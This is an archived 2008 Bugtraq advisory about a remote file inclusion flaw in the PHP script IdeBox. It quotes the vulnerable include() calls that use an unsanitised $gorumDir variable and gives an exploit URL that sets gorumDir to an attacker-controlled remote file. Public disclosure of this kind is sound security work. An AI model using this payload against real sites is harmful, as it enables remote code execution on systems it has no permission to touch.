lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 25 Jun 2008 15:17:38 +0300
From: Ghost hacker <ghost-r00t@...mail.com>
To: السيكروتي فوكس <bugtraq@...urityfocus.com>
Subject: IdeBox (include) Remote File Inclusion Vulnerability



##############################################################
 IdeBox (include) Remote File Inclusion Vulnerability
##############################################################
[~] Found : Ghost Hacker
[~] Home page  : www.Real-Hack.net
[~] Email : Ghost-r00t@...mail.com
[~] Script : IdeBox
[~] Download Script : http://ideabox.phpoutsourcing.com/ideabox_1_1.tgz
=========================== [ Viva IslaM ] ==========================
Error ( include.php ) :
include("$gorumDir/generformlib_date.php");
include("$gorumDir/notification.php");
include("$gorumDir/zmail.php");
include("$ideaDir/user.php");
include("$ideaDir/globalsettings.php");
include("$ideaDir/init.php");
include("$ideaDir/idea.php");
include("$ideaDir/history.php");
include("$ideaDir/cord.php");

Exploit :
http://xxxx/[Path]/include.php?gorumDir=[EVIL]
=========================== [ Viva IslaM ] ==========================
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & v4 TeaM & Aseg-Rabe7 & Mr.JUVE
Mr.hope & Mr.MoSoS & $eLe & MR.SQL & .. [ gh0st10.wordpress.com ] ..
All Member Real Hack And All My Friends :)
##############################################################
 Found By Ghost Hacker & My TeaM R-H
##############################################################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

Powered by blists - more mailing lists